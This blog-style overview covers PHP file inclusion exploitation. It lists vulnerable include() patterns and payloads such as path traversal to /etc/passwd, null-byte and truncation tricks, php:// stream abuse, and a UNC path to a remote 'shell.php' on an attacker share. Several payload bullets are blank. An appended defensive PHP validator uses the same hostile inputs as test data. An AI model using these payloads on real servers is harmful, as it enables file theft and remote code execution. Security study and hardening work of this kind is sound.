
Exploiting PHP File Inclusion – Overview

For a better view of how the exploitation works, refer to the source.

Recently I have seen a lot of questions regarding PHP file inclusions and the possibilities you have, so I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like to have them summed up in one place.

Basic Local File Inclusion:

<?php include("inc/" . $_GET['file']); ?>

  • Including files in the same directory:
  • Path Traversal:
    (this file is very interesting because it lets you search the filesystem, other files)
  • Including injected PHP code:

Limited Local File Inclusion:

<?php include("inc/" . $_GET['file'] . ".htm"); ?>

  • Null Byte Injection:
    (requires magic_quotes_gpc=off)
  • Directory Listing with Null Byte Injection:
    (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
    (more details see here and here)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd……………. …
    (Windows only, more details here)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (more details here)

Basic Remote File Inclusion:

<?php include($_GET['file']); ?>

  • Including Remote Code:
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using PHP stream php://input:
    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
  • Using PHP stream php://filter:
    (lets you read PHP source because it won't get evaluated in base64. More details here and here)
  • Using data URIs:
    (requires allow_url_include=On)
  • Using XSS:
    (makes sense if firewalled or only whitelisted domains allowed)

Limited Remote File Inclusion:

<?php include($_GET['file'] . ".htm"); ?>

  • ?file=
  • ?file=
  • ?file=
    (requires allow_url_fopen=On and allow_url_include=On)
  • ?file=\\evilshare\shell.php
    (bypasses allow_url_fopen=Off)

Static Remote File Inclusion:

  • Man In The Middle
    (lame indeed, but often forgotten)

Filter evasion:

  • Access files with wildcards (read more here)

Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I’ll add them.
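
A hardened counterpart to the `include("inc/" . $_GET['file'] . ".htm")` pattern above, as an added example that is not part of the original post; the function name `resolve_include`, the temporary directory and `home.htm` are assumptions made for the demonstration. It refuses requests by syntax and canonical path instead of relying on `allow_url_fopen` or `allow_url_include`, since the list above notes that a UNC path gets past `allow_url_fopen=Off`.

```php
<?php
// Added example, not from the original post. Names and paths are assumptions.

/**
 * Map a user-supplied page name to a file inside $baseDir.
 * Returns the canonical path, or null when the request must be refused.
 */
function resolve_include(string $name, string $baseDir): ?string
{
    // Syntax check first: plain page names only. Refuses "../", null bytes,
    // dot/backslash padding, stream wrappers (php://, data:, http://) and
    // UNC paths before any filesystem function sees the value.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // Canonicalise, then confirm the file is still below $baseDir
    // (covers symlinks placed inside the include directory).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.htm');
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a temporary include directory with one page.
$inc = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($inc);
file_put_contents($inc . DIRECTORY_SEPARATOR . 'home.htm', '<p>home</p>');

// Request shapes taken from the categories in the overview (constructed values).
$requests = [
    'home',
    '../../../../../../../../../etc/passwd',
    "home\0",
    'home.\.\.\.\.\.',
    'php://input',
    '\\\\evilshare\\shell.php',
];
foreach ($requests as $r) {
    $p = resolve_include($r, $inc);
    $shown = json_encode($r, JSON_UNESCAPED_SLASHES);
    echo str_pad($shown, 44), $p === null ? 'refused' : 'include ' . basename($p), "\n";
}

unlink($inc . DIRECTORY_SEPARATOR . 'home.htm');
rmdir($inc);
```

In a page handler, pass only the non-null return value to `include` and answer every refused request with a 404.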

Links of interest: --Complete
